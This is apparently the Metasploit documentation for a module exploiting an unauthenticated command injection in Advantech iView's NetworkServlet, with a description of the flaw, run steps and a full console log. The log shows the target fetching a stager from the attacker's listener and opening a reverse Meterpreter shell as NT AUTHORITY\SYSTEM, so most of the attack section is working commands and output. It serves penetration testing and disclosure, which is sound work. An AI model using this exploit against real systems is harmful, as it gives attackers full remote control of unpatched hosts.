## Vulnerable Application

Versions of Advantech iView software below `5.7.04.6469` are vulnerable to
an unauthenticated command injection vulnerability via the `NetworkServlet` endpoint.
The database backup functionality passes a user-controlled parameter, `backup_file`
to the `mysqldump` command. The sanitization functionality only tests for SQL injection
attempts and directory traversal, so leveraging the `-r` and `-w` `mysqldump` flags
permits exploitation. The command injection vulnerability is used to write a
payload on the target and achieve remote code execution as NT AUTHORITY\SYSTEM.

A vulnerable version can be installed from [here](https://downloadt.advantech.com/download/downloadsr.aspx?File_Id=1-26RVVS9).

Other versions of the software can be found [here](https://www.advantech.tw/support/details/firmware?id=1-HIPU-183).

### Installation Instructions

Distributed with the installer is a PDF containing detailed installation instructions
for the software. Once the installation has finished, you may have issues getting the
Tomcat service to start. If that's the case, follow the steps below (pulled from advantech_iview_unauth_rce.md):

  1. Copy the msvcr100.dll file from C:\Program Files (x86)\Java\jre7\bin to C:\Program Files (x86)\iView\Apache Software Foundation\Tomcat6.0\bin.
  2. Restart the "Apache Tomcat 6" service. 1 At this point, the application should be listening on port 8080 and no additional configuration is necessary.

## Verification Steps

1. Install the application
2. Start msfconsole
3. Do: `use exploit/windows/http/advantech_iview_networkservlet_cmd_inject`
4. Do: `set RHOST <ip>`
5. Do: `run`
6. You should get a meterpreter session.

## Options

## Scenarios

### Advantech iView Webserver `v5.7.04.6425` on Windows 10 21H2 x64

```
msf6 > use exploit/windows/http/advantech_iview_networkservlet_cmd_inject
[*] Using configured payload windows/x64/meterpreter/reverse_tcp
msf6 exploit(windows/http/advantech_iview_networkservlet_cmd_inject) > set rhost 192.168.140.197
rhost => 192.168.140.197
msf6 exploit(windows/http/advantech_iview_networkservlet_cmd_inject) > set lhost 192.168.140.1
lhost => 192.168.140.1
msf6 exploit(windows/http/advantech_iview_networkservlet_cmd_inject) > run

[*] Started reverse TCP handler on 192.168.140.1:4444
[*] Running automatic check ("set AutoCheck false" to disable)
[+] The target appears to be vulnerable.
[*] Using URL: http://192.168.140.1:8080/QVp4zocvVZ9f
[*] Client 192.168.140.197 (Mozilla/5.0 (Windows NT; Windows NT 10.0; en-US) WindowsPowerShell/5.1.19041.1237) requested /QVp4zocvVZ9f
[*] Sending payload to 192.168.140.197 (Mozilla/5.0 (Windows NT; Windows NT 10.0; en-US) WindowsPowerShell/5.1.19041.1237)
[*] Sending stage (200774 bytes) to 192.168.140.197
[*] Command Stager progress - 100.00% done (125/125 bytes)
[*] Meterpreter session 1 opened (192.168.140.1:4444 -> 192.168.140.197:50152) at 2022-07-21 16:48:57 -0500
[*] Server stopped.
[!] This exploit may require manual cleanup of 'webapps\iView3\vQbGQrFe.jsp' on the target

meterpreter > getuid
Server username: NT AUTHORITY\SYSTEM
meterpreter > sysinfo
Computer        : DESKTOP-04M9HG7
OS              : Windows 10 (10.0 Build 19044).
Architecture    : x64
System Language : en_US
Domain          : WORKGROUP
Logged On Users : 2
Meterpreter     : x64/windows
meterpreter >
```
